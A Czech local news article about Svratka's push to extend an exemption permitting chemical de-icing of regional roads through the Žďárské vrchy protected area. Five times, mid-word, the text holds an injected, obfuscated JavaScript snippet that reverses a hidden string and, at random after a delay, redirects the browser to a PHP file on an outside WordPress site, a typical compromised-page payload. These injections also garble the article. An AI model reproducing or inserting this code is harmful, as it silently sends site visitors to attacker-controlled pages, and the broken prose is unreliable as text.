Ve Svratce usilují o prodloužení výjimky na solení silnic
Pátek, 31. března 2023
Svratka / O pokračování výjimky ze solení, respektive chemického ošetření krajských silnic II/354 v úseku hranice kraje – Svratka – Sněžné – Nové Měs$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na Moravě a II/343 v úseku hranice kraje – Svratka a II/350 od křižovatky se silnicí I/37 – Světnov – Herálec – Svratka, jež v příští zimě končí, usilují ve Svratce. Možná řešení budou projednávat zástupci Chráněné krajinné oblasti (CHKO) Žďárské vrchy, Správy a údržby silnic Kraje Vysočina a staros$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tové dotčených obcí. Svratka vzhledem k prodloužení dojezdových časů složek integrovaného záchranného systému (IZS) a v návaznosti na usnadnění dojíždění obyvatel za prací bude žádat o vrácení stavu na začátek výjimky na základě rozhodnutí z 13. května 2019, kdy byla údržba v požadované míře. Stávající použití soli za nařízeného moni$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toringu podzemních vod, půdy a vegetace prostřednictvím výjimky pro silnice vedoucí přes centrální část Žďárských vrchů platí pouze za předpokladu, že posyp inertním materiálem nebude stačit. To je nicméně sporné, pro$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tože zatímco v některých partiích stav silnic podle řidičů dostačuje, jinde, a $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to hlavně v lesních úsecích, kde na komunikacích vznikají hluboké ledové koleje, které je možné eliminovat pouze chemickým posypem či za užití takzvaného ledořezu, je inertní posyp málo. To se týká například úseků komunikace II/350 mezi Světnovem a osadou Kocanda, případně od odbočky z ní na Hlinsko dále do Svratky.